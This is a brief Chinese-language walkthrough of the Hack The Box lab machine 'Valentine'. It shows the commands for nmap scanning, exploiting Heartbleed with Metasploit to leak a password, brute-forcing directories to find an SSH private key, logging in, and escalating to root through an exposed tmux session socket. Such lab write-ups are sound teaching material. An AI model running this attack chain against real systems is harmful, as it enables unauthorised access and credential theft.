【HTB Machine】Valentine

【HTB Machine】Valentine

LHOST: 10.10.16.13
RHOST: 10.129.11.184
1
nmap -sCV 10.129.11.184

image1

1
nmap --script vuln 10.129.11.184

image2

Heartbleed 有心臟出血漏洞

網路上很多 POC, 這邊直接開 metasploit 來攻擊

1
2
3
4
5
6
msfconsole
search openssl
use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS 10.129.11.184
set verbose true
run

image3

有一串看起來像 Base64 的字串,拿去解密

image4

看起來像密碼

現在來找使用者名稱

使用 dirbuster 爆破目錄

image5

/dev/hype_key 看起來很有趣

下載下來後拿去 xxd 會發現是 ssh private key

拿來登入看看,這裡需要通靈一下,使用者名稱是 hype

1
2
chmod 600 hype_key
ssh -i hype_key hype@10.129.11.184 -o PubkeyAcceptedKeyTypes=+ssh-rsa # 加上 PubkeyAcceptedKeyTypes 是因為這個 key 太舊而不會被新版的 ssh 接受

image6

User Pwned!!!

提權

看看歷史指令紀錄

1
history

image7

這個使用者使用過 tmux,開了一個 dev session,照著他的指令打一遍看看

1
tmux -S /.devs/dev_sess

直接拿到 root shell

image8

Root Pwned!!!

Summary

這題除了通靈使用者名稱外還算簡單,下次有空來試試看不用 metasploit 的方式來 exploit Heartbleed